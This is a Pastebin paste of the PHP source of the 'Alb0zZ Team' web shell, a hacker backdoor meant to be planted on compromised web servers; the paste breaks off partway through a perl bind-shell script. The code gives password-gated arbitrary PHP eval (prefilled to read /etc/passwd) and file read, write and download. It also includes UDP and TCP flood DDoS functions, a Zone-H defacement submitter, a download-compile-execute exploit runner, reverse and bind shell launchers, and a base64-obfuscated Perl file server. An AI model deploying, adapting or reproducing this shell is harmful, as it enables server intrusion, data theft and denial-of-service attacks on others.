AnonYmous-IQ

Alb0zZ Team Shell

Sep 18th, 2017
619
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 57.76 KB | None | 0 0
  1. <?php
  2. session_start();
  3.  
  4.  
  5. error_reporting(E_ERROR | E_PARSE);
  6. @ini_set("max_execution_time",0);
  7. @set_time_limit(0); #No Fx in SafeMode
  8. @ignore_user_abort(TRUE);
  9. @set_magic_quotes_runtime(0);
  10.  
  11. // global configs
  12.  
  13. $password = "AnonYmous-IQ"; // shell password, change it, max 50 chars
  14. $about = "<span style=\"font-family: Tahoma, Geneva, sans-serif;font-size:13px;color:red;\">-=-=-=-=-=-=-=-=-=-=-=-=-<br>
  15. <br><!-- kid still viewing ma source ? :P -->
  16.      ~~Alb0zZ Team shell~~<br>
  17.     =====================<br>
  18.     ~from the ground<br>
  19.     =====================<br>
  20.     ~coded by 0x0 from Alb0zZ Team (Albanian Hacker)<br>
  21.     ~get happy!<br>
  22.     ~this could be priv8<br>
  23. <br>
  24.     ~Greetz: PirateAl/FlashcR3w, h4x0rs (munp, IRT, xr4ge), AHG Cr3w, NHG (Nairoby Hacking Group), AHC<br>
  25.     ~Greetz: Danzel, Red Dragon_Al, Retn0Hazard, gForce(saga :P), R-t33n, X-h4ck, dA3m0n, autorun, RaY.4L, DR.IMP, TuPac^SHaKuR, B1j3mb3x<br>
  26.     ~Greetz: Dyn99, darkninja, darkfox, Bl4zE, negative#, TopSecret, esc0bar :), WeedHoax, The0c, The.Directory, Cleaver, Wino, Eragon, MaRiO, iC3 WaRmTh, The3 HackersLord=] and U<br>
  27.     <br><br>
  28. <br>
  29.         <br><br><br><center>-=-=-=-=-=-=-=-=-=-=-=-=-=-HBD ALBANIA-=-=-=-=-=-=-=-=-=-=-=-=-=-<br>
  30.         ~Gezuar 100 Vjetorin~</center></span>";
  31.        
  32. // symlink script :)       
  33. $symlink = stripslashes(base64_decode("IyEvdXNyL2Jpbi9lbnYgcGVybA0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KDQp1c2UgU29ja2V0Ow0KDQokcG9ydCA9IDEzMTIzOw0KDQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoXCd0Y3BcJyk7DQpzb2NrZXQoUywmUEZfSU5FVCwmU09DS19TVFJFQU0sJHByb3RvY29sKSB8fCBkaWU7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kIChTLHNvY2thZGRyX2luKCRwb3J0LElOQUREUl9BTlkpKSB8fCBkaWU7DQpsaXN0ZW4gKFMsMykgfHwgZGllOw0Kd2hpbGUoMSl7DQoJYWNjZXB0IChDT05OLFMpOw0KCSRyZXE9PENPTk4+OyBjaG9tcCgkcmVxKTsgJHJlcT1+cy9cXHIvL2c7DQoJJHJlcSA9fiBzL1xcJShbQS1GYS1mMC05XXsyfSkvcGFjayhcJ0NcJywgaGV4KCQxKSkvc2VnOw0KCQ0KCXByaW50ICRyZXEuXCJcXHJcXG5cIjsNCgkNCgkkaGVhZGVycyA9IFwiSFRUUC8xLjEgMjAwIE9LXFxyXFxuXCI7DQoJJGhlYWRlcnMgLj0gXCJTZXJ2ZXI6IFBlcmxcXHJcXG5cIjsNCgkNCgkkdGFyZ2V0ID0gJHJlcTsNCglpZigkcmVxID1+IC9HRVQgLiogSFRUUC4qLyl7DQoJCSR0YXJnZXQgPX4gcy9HRVRcXCAvLzsNCgkJJHRhcmdldCA9fiBzL1xcIEhUVFAuKi8vOw0KCQkkcmVzcCA9IFwiXCI7DQoJCWlmKC1kICR0YXJnZXQpew0KCQkJaWYoISgkdGFyZ2V0ID1+IC8uKlxcLyskLykpew0KCQkJCSR0YXJnZXQgPSAkdGFyZ2V0LlwiL1wiOw0KCQkJfQ0KCQkJDQoJCQkkcmVzcCA9IFwiPCFET0NUWVBFIGh0bWwgUFVCTElDIFxcXCItLy9XM0MvL0RURCBIVE1MIDMuMiBGaW5hbC8vRU5cXFwiPg0KCQkJCQk8aHRtbD4NCgkJCQkJPHRpdGxlPkRpcmVjdG9yeSBsaXN0aW5nIGZvciBcIi4kdGFyZ2V0LlwiPC90aXRsZT4NCgkJCQkJPGJvZHk+DQoJCQkJCTxoMj5EaXJlY3RvcnkgbGlzdGluZyBmb3IgXCIuJHRhcmdldC5cIjwvaDI+DQoJCQkJCTxocj48dWw+XCI7DQoJCQkJCQ0KCQkJaWYob3BlbmRpcihESVIsJHRhcmdldCkpew0KCQkJCXdoaWxlKCRmaWxlID0gcmVhZGRpcihESVIpKXsNCgkJCQkJaWYoLWQgJHRhcmdldC4kZmlsZSl7DQoJCQkJCQlpZigoJGZpbGUgZXEgXCIuXCIpIHx8ICgkZmlsZSBlcSBcIi4uXCIpKXsgbmV4dDsgfQ0KCQkJCQkJJHJlc3AgLj0gXCI8bGk+PGEgaHJlZj1cXFwiXCIuJHRhcmdldC4kZmlsZS5cIi9cXFwiPlwiLiRmaWxlLlwiLzwvYT48L2xpPlxcclxcblwiOw0KCQkJCQl9DQoJCQkJCWVsc2lmKC1mICR0YXJnZXQuJGZpbGUpew0KCQkJCQkJJHJlc3AgLj0gXCI8bGk+PGEgaHJlZj1cXFwiXCIuJHRhcmdldC4kZmlsZS5cIlxcXCI+XCIuJGZpbGUuXCI8L2E+PC9saT5cXHJcXG5cIjsNCgkJCQkJfQ0KCQkJCX0NCgkJCQljbG9zZWRpcihESVIpOw0KCQkJfQ0KDQoJCQkkcmVzcCAuPSBcIjwvdWw+PGhyPg0KCQkJCQk8L2JvZHk+DQoJCQkJCTwvaHRtbD5cIjsNCgkJCQkJDQoJCQkkY29ubGVuID0gbGVuZ3RoKCRyZXNwKTsNCgkJCSRjb250eXBlID0gXCJ0ZXh0L2h0bWxcIjsNCgkJCXByaW50IFwiRGlyIDogXCIuJHRhcmdldC5cIlxcclxcblwiOw0KCQl9DQoJCWVsc2lmKC1mICR0YXJnZXQpew0KCQkJJGNvbmxlbiA9IC1zICR0YXJnZXQ7DQoJCQkkY29udHlwZSA9IFwidGV4dC9wbGFpblwiOw0KCQkJcHJpbnQgXCJGaWxlIDogXCIuJHRhcmdldC5cIiAoXCIuJGNvbmxlbi5cIilcXHJcXG5cIjsNCgkJfQ0KDQoJCXByaW50IFwiY29udHlwZSA6IFwiLiRjb250eXBlLlwiXFxyXFxuXCI7DQoJCXByaW50IFwiY29ubGVuIDogXCIuJGNvbmxlbi5cIlxcclxcblwiOw0KCQkNCgkJJGhlYWRlcnMgLj0gXCJDb250ZW50LVR5cGU6IFwiLiRjb250eXBlLlwiXFxyXFxuXCI7DQoJCSRoZWFkZXJzIC49IFwiQ29udGVudC1MZW5ndGg6IFwiLiRjb25sZW4uXCJcXHJcXG5cIjsNCgkNCgkJcHJpbnQgQ09OTiAkaGVhZGVycy5cIlxcclxcblwiOw0KCQkNCgkJaWYoLWQgJHRhcmdldCl7DQoJCQlwcmludCBDT05OICRyZXNwOw0KCQl9DQoJCWVsc2lmKC1mICR0YXJnZXQpew0KCQkJaWYob3BlbihGSUxFLCR0YXJnZXQpKXsNCgkJCQliaW5tb2RlIEZJTEU7DQoJCQkJd2hpbGUgKCgkbiA9IHJlYWQgRklMRSwgJGRhdGEsIDEwMjQpICE9IDApIHsgDQoJCQkJCXByaW50IENPTk4gJGRhdGE7DQoJCQkJfSANCgkJCQljbG9zZShGSUxFKTsgDQoJCQl9DQoJCX0NCgl9DQoJY2xvc2UgQ09OTjsNCn0NCmV4aXQgMDs="));
  34.  
  35.  
  36. function Zip($source, $destination) // Thanks to Alix Axel
  37. {
  38.     if (!extension_loaded('zip') || !file_exists($source)) {
  39.         return false;
  40.     }
  41.  
  42.     $zip = new ZipArchive();
  43.     if (!$zip->open($destination, ZIPARCHIVE::CREATE)) {
  44.         return false;
  45.     }
  46.  
  47.     $source = str_replace('\\', '/', realpath($source));
  48.  
  49.     if (is_dir($source) === true)
  50.     {
  51.         $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  52.  
  53.         foreach ($files as $file)
  54.         {
  55.             $file = str_replace('\\', '/', realpath($file));
  56.  
  57.             if (is_dir($file) === true)
  58.             {
  59.                 $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  60.             }
  61.             else if (is_file($file) === true)
  62.             {
  63.                 $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  64.             }
  65.         }
  66.     }
  67.     else if (is_file($source) === true)
  68.     {
  69.         $zip->addFromString(basename($source), file_get_contents($source));
  70.     }
  71.  
  72.     return $zip->close();
  73. }
  74.  
  75. function getperms ($file) {        
  76.     $perm = substr(sprintf('%o', fileperms($file)), -4);
  77.     return $perm;
  78. }
  79.  
  80. if(isset($_GET['zip'])) {
  81.     $src = $_GET['zip'];
  82.     $dst = getcwd()."/".basename($_GET['zip']).".zip";
  83.     if (Zip($src, $dst) != false) {
  84.         $filez = file_get_contents($dst);
  85.         header("Content-type: application/octet-stream");
  86.         header("Content-length: ".strlen($filez));
  87.         header("Content-disposition: attachment; filename=\"".basename($dst)."\";");
  88.         echo $filez;
  89.     }
  90.     exit;
  91. }
  92.  
  93. function showDrives()
  94.     {
  95.         global $self;
  96.         foreach(range('A','Z') as $drive)
  97.         {
  98.             if(is_dir($drive.':\\'))
  99.             {
  100.                 ?>
  101.                 &nbsp;&nbsp;&nbsp;&nbsp;<a style="font-family:vernada;color:pink" href='<?php echo $self ?>?go=<?php echo $drive.":\\"; ?>&action=files'>
  102.                     <?php echo $drive.":\\" ?>
  103.                 </a>
  104.                 <?php
  105.             }
  106.         }
  107.     }
  108.  
  109.  
  110. function HumanReadableFilesize($size)
  111.     {
  112.  
  113.         $mod = 1024;
  114.  
  115.         $units = explode(' ','B KB MB GB TB PB');
  116.         for ($i = 0; $size > $mod; $i++)
  117.         {
  118.             $size /= $mod;
  119.         }
  120.  
  121.         return round($size, 2) . ' ' . $units[$i];
  122.     }
  123. function getFilePermissions($file)
  124. {
  125.    
  126. $perms = fileperms($file);
  127.  
  128. if (($perms & 0xC000) == 0xC000) {
  129.     // Socket
  130.     $info = 's';
  131. } elseif (($perms & 0xA000) == 0xA000) {
  132.     // Symbolic Link
  133.     $info = 'l';
  134. } elseif (($perms & 0x8000) == 0x8000) {
  135.     // Regular
  136.     $info = '-';
  137. } elseif (($perms & 0x6000) == 0x6000) {
  138.     // Block special
  139.     $info = 'b';
  140. } elseif (($perms & 0x4000) == 0x4000) {
  141.     // Directory
  142.     $info = 'd';
  143. } elseif (($perms & 0x2000) == 0x2000) {
  144.     // Character special
  145.     $info = 'c';
  146. } elseif (($perms & 0x1000) == 0x1000) {
  147.     // FIFO pipe
  148.     $info = 'p';
  149. } else {
  150.     // Unknown
  151.     $info = 'u';
  152. }
  153.  
  154. // Owner
  155. $info .= (($perms & 0x0100) ? 'r' : '-');
  156. $info .= (($perms & 0x0080) ? 'w' : '-');
  157. $info .= (($perms & 0x0040) ?
  158.             (($perms & 0x0800) ? 's' : 'x' ) :
  159.             (($perms & 0x0800) ? 'S' : '-'));
  160.  
  161. // Group
  162. $info .= (($perms & 0x0020) ? 'r' : '-');
  163. $info .= (($perms & 0x0010) ? 'w' : '-');
  164. $info .= (($perms & 0x0008) ?
  165.             (($perms & 0x0400) ? 's' : 'x' ) :
  166.             (($perms & 0x0400) ? 'S' : '-'));
  167.  
  168. // World
  169. $info .= (($perms & 0x0004) ? 'r' : '-');
  170. $info .= (($perms & 0x0002) ? 'w' : '-');
  171. $info .= (($perms & 0x0001) ?
  172.             (($perms & 0x0200) ? 't' : 'x' ) :
  173.             (($perms & 0x0200) ? 'T' : '-'));
  174.  
  175. return $info;
  176.  
  177. }
  178. function dirSize($directory) {
  179.     $size = 0;
  180.     foreach(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($directory)) as $file){
  181.         try {      
  182.             $size += $file->getSize();
  183.         }
  184.         catch (Exception $e){    // Symlinks and other shits
  185.             $size += 0;
  186.         }
  187.     }
  188.     return $size;
  189. }
  190.  
  191. // ddos ./Syrian_Shell
  192. function DDOSTcp($url)
  193. {
  194.     while(1)
  195.     {
  196.         $ch = curl_init($url);
  197.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  198.         $do = curl_exec($ch);
  199.         curl_close($ch);
  200.         flush();
  201.     }
  202. return true;
  203. }
  204. function DDOSUdp($url)
  205. {
  206.     $packets = 0;
  207.     ignore_user_abort(TRUE);
  208.     set_time_limit(0);
  209.     for($i=0;$i<65000;$i++){$out .= 'X'; }
  210.     while(1)
  211.     {
  212.             $packets++;
  213.             $rand = rand(1,65000);
  214.             $fp = fsockopen('udp://'.$url, $rand, $errno, $errstr, 5);
  215.             if($fp){fwrite($fp, $out); fclose($fp);}
  216.     } echo "UDP Flood : Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging\n";
  217. }
  218. function ZoneH($url, $hacker, $hackmode,$reson, $site )
  219. {
  220.     $k = curl_init();
  221.     curl_setopt($k, CURLOPT_URL, $url);
  222.     curl_setopt($k,CURLOPT_POST,true);
  223.     curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
  224.     curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
  225.     curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
  226.     $kubra = curl_exec($k);
  227.     curl_close($k);return $kubra;
  228. }
  229. // } syrian
  230.  
  231. ?>
  232. <html>
  233. <head>
  234. <title>Alb0zZ Team | Albanian shell</title>
  235. <style type="text/css">
  236. *{
  237. margin:0;
  238. padding:0;
  239. border:0;
  240. }
  241. body{
  242. background-color: black !important;
  243. color: green;
  244. }
  245. input, textarea, select{
  246. outline: none;
  247. }
  248. a{
  249. text-decoration:none;
  250. background:0 !important;
  251. color: #00cc00;
  252. }
  253. #menu{
  254. padding: 5px;
  255. border-bottom: 1px solid green;
  256. }
  257. #menu:hover{
  258. border-bottom: 1px solid red;
  259. }
  260. #menu a{
  261. padding: 3px;
  262. border: 1px solid green;
  263. color: green;
  264. text-decoration: none;color: #333333;
  265. font-family: Tahoma, Geneva, sans-serif;
  266. font-size:12px;
  267. background:0 !important;
  268. }
  269. #menu a:hover{
  270. border: 1px solid red;
  271. color: red;
  272. }
  273. #t-head{
  274. width:100%;
  275. background: #00aa00;
  276. }
  277. #t-head:hover{
  278. background: #00cc00;
  279. }
  280. #det{
  281. border-bottom: 1px solid green;
  282. font-family: οΏ½Courier NewοΏ½, Courier, monospace;
  283. font-size: 12px;
  284. }
  285. #det:hover{
  286. border-bottom: 1px solid #00ff00;
  287. }
  288. input[type=submit], input[type=text]{
  289. padding: 3px;
  290. color: #00ff00;
  291. border: 1px solid green;
  292. background: black;
  293. }
  294. input[type=submit]:hover, input[type=text]:hover{
  295. background: green;
  296. border: 1px solid #00ff00;
  297. }
  298. select{
  299. padding: 3px;
  300. width: 162px;
  301. color: #00ff00;
  302. border: 1px solid green;
  303. background: black;
  304. text-decoration: none;
  305. }
  306. select:hover{
  307. background: green;
  308. border: 1px solid #00ff00;
  309. }
  310. #commands{
  311. margin-left: 350px;
  312. margin-right: 350px;
  313. }
  314. option{
  315. background: green;
  316. color: #00ff00;
  317. }
  318. #box{
  319. margin-left: 350px;
  320. margin-right: 350px;
  321. border: 1px solid #00ff00;
  322. border-top:0;
  323. color: #006699;
  324. }
  325. #box span{
  326. margin-left: 10px;
  327. margin-right: 10px;
  328. display:block;
  329. padding: 4px;
  330. }
  331. #box span:hover{
  332. background-color:#444;
  333. padding: 3px;
  334. border: 1px solid #006699;
  335. color: #333;
  336. }
  337. #za{
  338. float:right;
  339.    border-top: 1px solid #96d1f8;
  340.    background: #0d5910;
  341.    background: -webkit-gradient(linear, left top, left bottom, from(#139e23), to(#0d5910));
  342.    background: -webkit-linear-gradient(top, #139e23, #0d5910);
  343.    background: -moz-linear-gradient(top, #139e23, #0d5910);
  344.    background: -ms-linear-gradient(top, #139e23, #0d5910);
  345.    background: -o-linear-gradient(top, #139e23, #0d5910);
  346.    padding: 3.5px 7px;
  347.    -webkit-border-radius: 4px;
  348.    -moz-border-radius: 4px;
  349.    border-radius: 4px;
  350.    -webkit-box-shadow: rgba(0,0,0,1) 0 1px 0;
  351.    -moz-box-shadow: rgba(0,0,0,1) 0 1px 0;
  352.    box-shadow: rgba(0,0,0,1) 0 1px 0;
  353.    text-shadow: rgba(0,0,0,.4) 0 1px 0;
  354.    color: #ffffff;
  355.    font-size: 11px;
  356.    font-family: Georgia, serif;
  357.    text-decoration: none;
  358.    vertical-align: middle;
  359. }
  360. #za:hover {
  361.    border-top-color: #28597a;
  362.    background: #28597a;
  363.    color: #ccc;
  364.    }
  365. #za:active {
  366.    border-top-color: #1b435e;
  367.    background: #1b435e;
  368.    }
  369. #sourcea{
  370. color: #00ff00;
  371. background-color:#002d00;
  372. width: 650px;
  373. height: 450px;
  374. }
  375. #source{
  376. margin-left: 350px;
  377. margin-right: 350px;
  378. color: #00ff00;
  379. background-color:#002d00;
  380. width: 650px;
  381. height: 450px;
  382. }
  383. /* mysql tables */
  384. #table{
  385. font-weight: bold;
  386. color: white;
  387. border: 1px solid red;
  388. background: black;
  389. }
  390. #onmouseover:hover{
  391. background-color:red;
  392. }
  393. /* phpinfo */
  394. tr, td, .h{
  395.     background: black !important;
  396.     color: white !important;
  397. }
  398. .v{
  399.     border: 1px solid white !important;
  400. }
  401. .e{
  402.     border: 1px solid red !important;
  403. }
  404. </style>
  405. </head>
  406. <body>
  407. <?php
  408.  
  409. // ================================
  410. // if user is logged in
  411.  
  412.  
  413. if(isset($_SESSION['loggedin']) && !empty($_SESSION['loggedin'])){
  414. // welcome user
  415. echo "<textarea id=\"t-head\">
  416. Server: ".gethostbyname($_SERVER["HTTP_HOST"])."    You: ".$_SERVER['REMOTE_ADDR']."    Php: ".phpversion()."    Apache: ".$_SERVER['SERVER_SOFTWARE']."    OS: ".php_uname()."</textarea>";
  417. ?>
  418. <center>
  419. <div id="menu">
  420. <a href="<?php echo htmlentities($_SERVER['PHP_SELF']); ?>">home</a>
  421. <a href="?action=files">files</a>
  422. <a href="?turnoff=ini">php.ini</a>
  423. <a href="?action=upload">upload</a>
  424. <a href="?action=encoders">encoders</a>
  425. <a href="?action=bind">bind</a>
  426. <a href="?action=exploit">exploit</a>
  427. <a href="?action=symlink" onclick="alert('The window will load and load\nAccess the tool by going to site.com:13123')">symlink</a>
  428. <a href="?action=eval">eval</a>
  429. <a href="?action=mass">mass</a>
  430. <a href="?action=proc">proc</a>
  431. <a href="?action=zone-h">zone-h</a>
  432. <a href="?action=ddos">ddos</a>
  433. <a href="?action=mysql&main=1">mysql</a>
  434. <a href="?action=tools">tools</a>
  435. <a href="?action=phpinfo">phpinfo</a>
  436. <a href="?action=logout" onclick="alert('You will get logged out')">log out</a>
  437. <a href="?action=kill">kill</a>
  438. </div>
  439. <div id="det">
  440. <?php
  441. if(ini_get('safe_mode') == '1'){
  442. echo '<font color="#333333"> Safe mode:</font><font color="red"> ON</font></font>';
  443. }
  444. else{
  445. echo '<font color="#333333"> Safe mode:</font><font color="green"> OFF</font>';
  446. }
  447. if(ini_get('magic_quotes_gpc') == '1'){
  448. echo '<font color="#333333"> Magic_quotes_gpc:</font><font color="red"> ON</font> <a href="?turnoff=magic_quotes_gpc"><font color="#00ff00">Turn off</a>';
  449. }
  450. else{
  451. echo '<font color="#333333"> Magic_quotes_gpc:</font><font color="green"> OFF</font>';
  452. }
  453. if(function_exists('mysql_connect')){
  454. echo '<font color="#333333"> Mysql:</font><font color="green"> ON</font>';
  455. }
  456. else{
  457. echo '<font color="#333333"> Mysql:</font><font color="red"> OFF</font>';
  458. }
  459. if(function_exists('mssql_connect')){
  460. echo '<font color="#333333"> Mssql:</font><font color="green"> ON</font>';
  461. }
  462. else{
  463. echo '<font color="#333333"> Mssql:</font><font color="yellow"> OFF</font>';
  464. }
  465. if(function_exists('pg_connect')){
  466. echo '<font color="#333333"> PostgreSQL:</font><font color="green"> ON</font>';
  467. }
  468. else{
  469. echo '<font color="#333333"> PostgreSQL:</font><font color="yellow"> OFF</font>';
  470. }
  471. if(function_exists('ocilogon')){
  472. echo '<font color="#333333"> Oracle:</font><font color="green"> ON</font>';
  473. }
  474. else{
  475. echo '<font color="#333333"> Oracle:</font><font color="yellow"> OFF</font>';
  476. }
  477. if(function_exists('curl_version')){
  478. echo '<font color="#333333"> Curl:</font><font color="green"> ON</font>';
  479. }
  480. else{
  481. echo '<font color="#333333"> Curl:</font><font color="red"> OFF</font>';
  482. }
  483. if(function_exists('exec')){
  484. echo '<font color="#333333"> Exec:</font><font color="green"> ON</font>';
  485. }
  486. else{
  487. echo '<font color="#333333"> Exec:</font><font color="red"> OFF</font>';
  488. }
  489. if(!ini_get('open_basedir') != "on"){
  490. echo '<font color="#333333"> Open_basedir:</font><font color="red"> OFF</font>';
  491. }
  492. else{
  493. echo '<font color="#333333"> Open_basedir:</font><font color="green"> ON</font>';
  494. }
  495. if(!ini_get('ini_restore') != "on"){
  496. echo '<font color="#333333"> Ini_restore:</font><font color="red"> OFF</font>';
  497. }
  498. else{
  499. echo '<font color="#333333"> Ini_restore:</font><font color="green"> ON</font>';
  500. }
  501. ?>
  502. </div>
  503. <div id="det">
  504. <?php
  505. echo '<font color="#333333"> Disable_functions: </font>';
  506. if(ini_get('disable_functions') == ''){
  507. echo ' <font color="green"> None</font>';
  508. }
  509. else{
  510. echo '<font color="red">';
  511. echo ini_get('disable_functions');
  512. echo '</font>';
  513. }
  514. ?>
  515. </div></center>
  516. <?php
  517. if(isset($_POST['source']) && isset($_POST['file'])){
  518. $source = $_POST['source'];
  519. $file = $_POST['file'];
  520. $fp = fopen($file, 'w');
  521. fwrite($fp, $source);
  522. fclose($fp);
  523. echo '<center><font color="green"><b>File saved</b></font></center>';
  524. }
  525. if(isset($_GET['turnoff'])){
  526. if(is_writable(".htaccess")){
  527. $value = $_GET['turnoff'];
  528. if(file_exists(".htaccess")){
  529. // fread example
  530. $handle = fopen(".htaccess", "r");
  531. $contents = '';
  532. while (!feof($handle)) {
  533. $read = fread($handle, 8192);
  534. $contents = $contents.$read;
  535. ?>
  536. <center><span style="color: #333333;font-family: οΏ½Courier NewοΏ½, Courier, monospace;font-size:12px">Use htaccess to turn php.ini functions on/off<br>Example: php_value magic_quotes_gpc off</span></center>
  537. <form action="" method="post">
  538. <textarea id="source" name="source">
  539. <?php
  540. if($value == 'magic_quotes_gpc'){
  541. $data = 'php_value magic_quotes_gpc off
  542. '.$contents;
  543. echo $data;
  544. }
  545. else{
  546. echo $contents;
  547. }
  548.     ?>
  549.     </textarea>
  550.     <input type="hidden" name="file" value=".htaccess"><br>
  551.     <center><input type="submit" value="Save File"></center>
  552.     </form>
  553.     <?php
  554. }
  555. fclose($handle);
  556. }
  557. }
  558. if(!file_exists(".htaccess")){
  559. // make htaccess file
  560. $myfile = '.htaccess';
  561. $handle = fopen($myfile, 'w') or die('Cannot open file:  '.$myfile);
  562. fclose($handle);
  563. echo '<center><font color="green"><b>File created</b></font> <a href="?turnoff=ini">click here</a></center>';
  564. }
  565. ?>
  566. <?php
  567. }
  568. // make file
  569. if(isset($_GET['make'])){
  570. // file maker
  571. if(!file_exists($_GET['make'])){
  572. // make htaccess file
  573. $myfile = $_GET['make'];
  574. $handle = fopen($myfile, 'w') or die('Cannot open file:  '.$myfile);
  575. fclose($handle);
  576. echo '<center><font color="green"><b>File created</b></font> <a href="?view='.$myfile.'&dir=0">click here</a></center>';
  577. }
  578. else{
  579. echo '<center><font color="red">This file exist.</font>&nbsp;&nbsp;&nbsp;&nbsp; <a href="?delete='.$_GET['make'].'">delete</a>&nbsp;&nbsp;&nbsp;&nbsp; <a href="?view='.$_GET['make'].'">open</a><center>';
  580. }
  581. }
  582.  
  583. if(isset($_GET['get'])){
  584. // download
  585. $file = $_GET['get'];
  586. if (file_exists($file)) {
  587.     header('Content-Description: File Transfer');
  588.     header('Content-Type: application/octet-stream');
  589.     header('Content-Disposition: attachment; filename='.basename($file));
  590.     header('Content-Transfer-Encoding: binary');
  591.     header('Expires: 0');
  592.     header('Cache-Control: must-revalidate');
  593.     header('Pragma: public');
  594.     header('Content-Length: ' . filesize($file));
  595.     ob_clean();
  596.     flush();
  597.     readfile($file);
  598.     exit();
  599. }
  600. }
  601.  
  602. if(isset($_GET['view'])){
  603. $file = $_GET['view'];
  604. ?>
  605. <form action="" method="post">
  606. <textarea id="source" name="source">
  607. <?php
  608. if(file_exists($file)){
  609. $open = htmlspecialchars(file_get_contents($file));
  610. if($open){
  611. echo $open;
  612. }
  613. }
  614. else{
  615. echo '              FILE DOES NOT EXISTS';
  616. }
  617. ?>
  618. </textarea>
  619. <input type="hidden" name="file" value="<?php echo $file; ?>"><br>
  620. <center><input type="submit" value="Save File"> <a href="?zip=<?php echo $file; ?>" style="font-size:14;padding: 3px;border: 1px solid green;background: black;color: #00ff00;">Download</a> <a href="?delete=<?php echo $file; ?>&action=files" style="font-size:14;padding: 3px;border: 1px solid green;background: black;color: #00ff00;">Delete</a></center>
  621. </form>
  622. <?php
  623. }
  624.  
  625. if(isset($_GET['action']) && $_GET['action'] == 'symlink'){
  626. $a = fopen("lolz.pl", "w");
  627. fputs($a, $symlink);
  628. fclose($a);
  629. system("perl lolz.pl");
  630. }
  631.  
  632. if(isset($_GET['action']) && $_GET['action'] == 'ddos' && empty($_POST['ip'])){
  633. ?>
  634. <center>
  635. <span style="font-family: Tahoma, Geneva, sans-serif;font-size: 12px; color: #333;">~<br />Ddos<br />~<br /></span>
  636. <form action="" method="post">
  637. <input type="text" value="http://site.com/" name="ip">
  638. <input type="hidden" name="action" value="ddos">
  639. <input type="submit">
  640. <select style="width:60px" name="way">
  641. <option>TCP</option>
  642. <option>UDP</option>
  643. </select>
  644. </form>
  645. </center>
  646. <?php
  647. }
  648. if(isset($_GET['action']) && $_GET['action'] == 'ddos' && !empty($_POST['ip'])){
  649. $url = $_POST['ip'];
  650. if($_POST['way'] == "TCP"){
  651. DDOSTcp($url);
  652. }
  653. else if($_POST['way'] == "UDP"){
  654. DDOSUdp($url);
  655. }
  656. else{
  657. echo 'No other methods.';
  658. }
  659. }
  660.  
  661. if(isset($_GET['action']) && $_GET['action'] == 'eval'){
  662. ?>
  663. <center>
  664. <form action="" method="get">
  665. <span style="font-family: Tahoma, Geneva, sans-serif;font-size: 12px; color: #333;">~<br />Eval<br />~<br /></span>
  666. <input type="hidden" name="action" value="eval">
  667. <input type="text" name="evalit" value="file_get_contents('/etc/passwd');"><input type="submit" value="Ex3cut3">
  668. </form>
  669. <?php
  670. if(isset($_GET['evalit'])){
  671. if(function_exists("system")){
  672. $ev = $_GET['evalit'];
  673. echo eval(stripslashes($ev));
  674. }
  675. else{
  676. echo 'eval disabled';
  677. }
  678. }
  679. echo '<center>';
  680. }
  681.  
  682. if(isset($_GET['action']) && $_GET['action'] == 'exploit'){
  683. ?>
  684. <center>
  685. <span style="font-family: Tahoma, Geneva, sans-serif;font-size: 12px; color: #333;">~<br />Get and execute<br />~<br /></span>
  686. <form action="" method="get">
  687. <input type="text" name="exp_url" value="http://site.com/exploit"> Type:
  688. <select name="run">
  689. <option>c++ | .cpp</option>
  690. <option>python | .py</option>
  691. <option>perl | .pl</option>
  692. <option>ruby | .rb</option>
  693. </select>
  694. <input type="hidden" name="action" value="exploit">
  695. <input type="submit" value="Ex3cut3">
  696. </form>
  697. </center>
  698. <?php
  699. }
  700.  
  701. if(isset($_GET['exp_url'])){
  702. echo '<center>';
  703. if(function_exists("wget")){
  704. wget($_GET['exp_url']);
  705. echo $_GET['exp_url'].' got in here';
  706. if(function_exists("system")){
  707.  
  708. if(isset($_GET['run'])){
  709. $run = $_GET['run'];
  710. if($run = 'c++ | .cpp'){
  711. system("gcc -o exploit ".$_GET['exp_url'].";chmod +x exploit;./exploit;");
  712. }
  713. if($run = 'perl | .pl'){
  714. }
  715. if($run = 'python | .py'){
  716. }
  717. if($run = 'ruby | .rb'){
  718. }
  719.  
  720.  
  721. }
  722.  
  723.  
  724. }
  725. else{
  726. echo 'System command disabled';
  727. }
  728. }
  729. else{
  730. echo('wget disabled');
  731. }
  732. echo '</center>';
  733. }
  734.  
  735. if(isset($_GET['action']) && $_GET['action'] == 'bind'){
  736. if(!isset($_POST['port']) && empty($_POST['ip']) && empty($_POST['pyip']) && empty($_POST['rbip'])){
  737. echo "<center>#1 ./perl<br>";
  738. echo '<form action="?action=bind" method="post">
  739. <input type="text" value="port" name="port"><br>
  740. <input type="submit" value="Ex3cut3">
  741. </form><br><br>#2 ./bash<form action="" method="post">
  742. <input type="text" name="ip" value="ip"> <input type="text" name="theport" value="port" style="width:40px"><br>
  743. <input type="submit" value="Ex3cut3"></form>
  744. <br><br>#3 ./python<form action="" method="post">
  745. <input type="text" name="pyip" value="ip"> <input type="text" name="pyport" value="port" style="width:40px"><br>
  746. <input type="submit" value="Ex3cut3"></form>
  747. <br><br>#4 ./ruby linux<form action="" method="post">
  748. <input type="text" name="rbip" value="ip"> <input type="text" name="rbport" value="port" style="width:40px"><br>
  749. <input type="submit" value="Ex3cut3"></form>
  750. <br><br>#5 ./ruby win<form action="" method="post">
  751. <input type="text" name="rbipw" value="ip"> <input type="text" name="rbportw" value="port" style="width:40px"><br>
  752. <input type="submit" value="Ex3cut3"></form>
  753. ';
  754. }
  755. else{
  756. if(isset($_POST['port'])){
  757. $bind = "
  758. #!/usr/bin/perl
  759.  
  760. \$port = {$_POST['port']};
  761. \$port = \$ARGV[0] if \$ARGV[0];
  762. exit if fork;
  763. $0 = \"updatedb\" . \" \" x100;
